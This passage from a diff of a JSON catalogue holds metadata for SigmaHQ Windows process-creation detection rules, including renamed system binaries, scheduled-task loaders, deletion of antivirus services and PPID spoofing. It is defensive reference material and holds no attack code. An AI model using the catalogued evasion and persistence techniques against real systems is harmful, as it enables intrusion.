"proc_creation_win_renamed_psexec.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_psexec.yml" + ], + "tags": [ + "car.2013-05-009", + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2", + "value": "Renamed PsExec" + }, + { + "description": "Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_rundll32.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32.yml" + ], + "tags": "No established tags" + }, + "uuid": "d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2", + "value": "Renamed Rundll32.exe Execution" + }, + { + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", + "value": "DllRegisterServer Call From Non Rundll32" + }, + { + "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_rurat.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.collection", + "attack.command_and_control", + "attack.discovery", + "attack.s0592" + ] + }, + "uuid": "9ef27c24-4903-4192-881a-3adde7ff92a5", + "value": "Execution of Renamed Remote Utilities RAT (RURAT)" + }, + { + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/06", + "falsepositive": [ + "System administrator usage" + ], + "filename": "proc_creation_win_renamed_sdelete.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "c1d867fe-8d95-4487-aab4-e53f2d339f90", + "value": "Renamed Sysinternals Sdelete Usage" + }, + { + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "meta": { + "author": "elhoim", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_vmnat.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/malmoeb/status/1525901219247845376", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "value": "Renamed or Portable Vmnat.exe" + }, + { + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_whoami.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "value": "Renamed Whoami Execution" + }, + { + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "meta": { + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "creation_date": "2020/10/10", + "falsepositive": [ + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + ], + "filename": "proc_creation_win_root_certificate_installed.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_root_certificate_installed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ] + }, + "uuid": "46591fae-7a4c-46ea-aec3-dff5e6d785dc", + "value": "Root Certificate Installed" + }, + { + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/13", + "falsepositive": [ + "Unknown", + "Some cases in which the service spawned a werfault.exe process" + ], + "filename": "proc_creation_win_rpcss_anomalies.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", + "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html", + "https://twitter.com/cyb3rops/status/1514217991034097664", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "value": "Remote Procedure Call Service Anomaly" + }, + { + "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", + "meta": { + "author": "CD_ROM_", + "creation_date": "2022/05/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_rundll32_parent_explorer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "1723e720-616d-4ddc-ab02-f7e3685a4713", + "value": "Rundll32 With Suspicious Parent Process" + }, + { + "description": "load malicious registered COM objects", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_rundll32_registered_com_objects.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "value": "Rundll32 Registered COM Objects" + }, + { + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_rundll32_unc_path.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" + ] + }, + "uuid": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "value": "Rundll32 UNC Path Execution" + }, + { + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "meta": { + "author": "Bartlomiej Czyz, Relativity", + "creation_date": "2021/01/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_rundll32_without_parameters.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://bczyz1.github.io/2021/01/30/psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "5bb68627-3198-40ca-b458-49f973db8752", + "value": "Rundll32 Without Parameters" + }, + { + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "meta": { + "author": "Tim Shelton, Florian Roth, Yassine Oukessou (fix + fp)", + "creation_date": "2022/01/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_run_executable_invalid_extension.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1481630810495139841?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml" + ], + "tags": "No established tags" + }, + "uuid": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "value": "Rundll32 Execution Without DLL File" + }, + { + "description": "Payloads may be compressed, archived, or encrypted in order to avoid detection", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_run_from_zip.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_from_zip.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "1a70042a-6622-4a2b-8958-267625349abf", + "value": "Run from a Zip File" + }, + { + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "meta": { + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", + "creation_date": "2019/10/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_run_powershell_script_from_ads.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "value": "Run PowerShell Script from ADS" + }, + { + "description": "Detects PowerShell script execution via input stream redirect", + "meta": { + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "creation_date": "2020/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_run_powershell_script_from_input_stream.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", + "https://twitter.com/Moriarty_Meng/status/984380793383370752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "value": "Run PowerShell Script from Redirected Input Stream" + }, + { + "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2020/09/26", + "falsepositive": [ + "This may have false positives on hosts where Virtualbox is legitimately being used for operations" + ], + "filename": "proc_creation_win_run_virtualbox.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1564/006/", + "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", + "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.006", + "attack.t1564" + ] + }, + "uuid": "bab049ca-7471-4828-9024-38279a4c04da", + "value": "Detect Virtualbox Driver Installation OR Starting Of VMs" + }, + { + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "meta": { + "author": "pH-T, Nasreddine Bencherchali", + "creation_date": "2022/03/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_schtasks_appdata_local_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "value": "Suspicious Schtasks Execution AppData Folder" + }, + { + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "meta": { + "author": "pH-T", + "creation_date": "2022/07/15", + "falsepositive": [ + "Software installation" + ], + "filename": "proc_creation_win_schtasks_once_0000.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml" + ], + "tags": "No established tags" + }, + "uuid": "970823b7-273b-460a-8afc-3a6811998529", + "value": "Uncommon Scheduled Task Once 00:00" + }, + { + "description": "Detects suspicious powershell execution that ends with a common flag instead of a command or a filename to execute (could be a sign of implicit execution that uses files in WindowsApps directory)", + "meta": { + "author": "pH-T, Florian Roth", + "creation_date": "2022/04/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_schtasks_powershell_windowsapps_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "b66474aa-bd92-4333-a16c-298155b120df", + "value": "Suspicious Powershell No File or Command" + }, + { + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "meta": { + "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T", + "creation_date": "2022/02/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_schtasks_reg_loader.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "value": "Scheduled Task Executing Powershell Encoded Payload from Registry" + }, + { + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_schtasks_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "89ca78fd-b37c-4310-b3d3-81a023f83936", + "value": "Schtasks Creation Or Modification With SYSTEM Privileges" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate usage of the tool" + ], + "filename": "proc_creation_win_screenconnect.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "57bff678-25d1-4d6c-8211-8ca106d12053", + "value": "Use of ScreenConnect Remote Access Software" + }, + { + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + ], + "filename": "proc_creation_win_screenconnect_anomaly.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "value": "ScreenConnect Backstage Mode Anomaly" + }, + { + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/06/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_script_event_consumer_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/child-processes/", + "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_script_event_consumer_spawn.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", + "value": "Script Event Consumer Spawning Process" + }, + { + "description": "Detects when attackers use \"sc.exe\" to delete AV services from the system in order to avoid detection", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such)" + ], + "filename": "proc_creation_win_sc_delete_av_services.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "7fd4bb39-12d0-45ab-bb36-cebabc73dc7b", + "value": "Suspicious Execution of Sc to Delete AV Services" + }, + { + "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", + "meta": { + "author": "frack113", + "creation_date": "2021/12/06", + "falsepositive": [ + "Legitimate query of a service by an administrator to get more information such as the state or PID" + ], + "filename": "proc_creation_win_sc_query.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_query.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1007" + ] + }, + "uuid": "57712d7a-679c-4a41-a913-87e7175ae429", + "value": "SC.EXE Query Execution" + }, + { + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sdbinst_shim_persistence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.011" + ] + }, + "uuid": "517490a7-115a-48c6-8862-1a481504d5a8", + "value": "Possible Shim Database Persistence via sdbinst.exe" + }, + { + "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sdclt_child_process.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/6", + "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "da2738f2-fadb-4394-afa7-0a0674885afa", + "value": "Sdclt Child Processes" + }, + { + "description": "Detects the use of SDelete to erase a file not the free space", + "meta": { + "author": "frack113", + "creation_date": "2021/06/03", + "falsepositive": [ + "System administrator usage" + ], + "filename": "proc_creation_win_sdelete.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdelete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "a4824fca-976f-4964-b334-0621379e84c4", + "value": "Sysinternals SDelete Delete File" + }, + { + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", + "meta": { + "author": "Nextron Systems", + "creation_date": "2022/06/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sdiagnhost_susp_child.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", + "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" + ] + }, + "uuid": "f3d39c45-de1a-4486-a687-ab126124f744", + "value": "Sdiagnhost Calling Suspicious Child Process" + }, + { + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/23", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_selectmyparent.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", + "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", + "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", + "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_selectmyparent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1134.004" + ] + }, + "uuid": "52ff7941-8211-46f9-84f8-9903efb7077d", + "value": "PPID Spoofing Tool Usage" + }, + { + "description": "Detects manual service execution (start) via system utilities.", + "meta": { + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate administrator or user executes a service for legitimate reasons." + ], + "filename": "proc_creation_win_service_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "2a072a96-a086-49fa-bcb5-15cc5a619093", + "value": "Service Execution" + }, + { + "description": "Detects a windows service to be stopped", + "meta": { + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "creation_date": "2019/10/23", + "falsepositive": [ + "Administrator shutting down the service due to upgrade or removal purposes" + ], + "filename": "proc_creation_win_service_stop.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_stop.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "eb87818d-db5d-49cc-a987-d5da331fbd90", + "value": "Stop Windows Service" + }, + { + "description": "Detects use of executionpolicy option to set insecure policies", + "meta": { + "author": "frack113", + "creation_date": "2021/11/01", + "falsepositive": [ + "Administrator script" + ], + "filename": "proc_creation_win_set_policies_to_unsecure_level.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", + "https://adsecurity.org/?p=2604", + "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "value": "Change PowerShell Policies to an Insecure Level" + }, + { + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_shadowcopy_deletion_via_powershell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + 